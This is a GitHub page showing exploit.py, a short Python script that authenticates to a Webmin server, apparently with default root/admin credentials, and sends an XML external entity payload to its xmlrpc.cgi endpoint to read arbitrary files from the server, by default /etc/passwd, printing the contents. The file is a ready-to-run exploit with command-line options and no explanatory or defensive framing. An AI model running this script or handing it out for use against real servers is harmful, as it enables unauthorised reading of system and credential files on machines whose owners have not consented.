-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathexploit.py
62 lines (50 loc) · 2.26 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import base64
import sys
import requests
import argparse
from urllib3 import disable_warnings
disable_warnings()
def cve(ip, port, user, password, file):
data = {
"page": "%2F",
"user": user,
"pass": password
}
url = "https://" + ip + ":" + str(port)
r = requests.post(url + "/session_login.cgi", data=data, cookies={"testing": "1"}, verify=False, allow_redirects=False)
r.close()
if r and r.status_code == 302 and "sid" in r.cookies.get_dict().keys():
sid = r.cookies.get_dict().get("sid")
cookie = {
"redirect": str(1),
"testing": str(1),
"sid": sid
}
vulnerable_url = url + "/xmlrpc.cgi"
headers = {
'Authorization': "Basic %s" % base64.b64encode((user + ":" + password).encode('ascii')).decode(),
# 'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
'Content-Type': "application/x-www-form-urlencoded",
}
payload = '<?xml version="1.0" encoding="utf-8"?> ' \
'<!DOCTYPE methodCall [ <!ENTITY file SYSTEM "file:' + file + '"> ]> <methodCall> <methodName>&file;</methodName> </methodCall>'
r = requests.post(url=vulnerable_url, headers=headers, data=payload, verify=False, cookies=cookie)
r.close()
try:
print(r.text.split("<string>Webmin module ")[1].split("does not exist</string>")[0])
except IndexError:
try:
print(base64.b64decode(r.text.split("<base64>")[1].split("</base64>")[0]).decode().split("Webmin module ip\t")[1].split("does not exist")[0])
except:
try:
print(base64.b64decode(r.text.split("<base64>")[1].split("</base64>")[0]).decode())
except:
print(r.text)
parser = argparse.ArgumentParser()
parser.add_argument('--ip', type=str, help="Server IP Address", required=True)
parser.add_argument("--port", type=int, default=10000)
parser.add_argument("--user", type=str, default="root")
parser.add_argument("--password", type=str, default="admin")
parser.add_argument("--file", type=str, default="/etc/passwd")
options = parser.parse_args(args=sys.argv[1:])
cve(options.ip, options.port, options.user, options.password, options.file)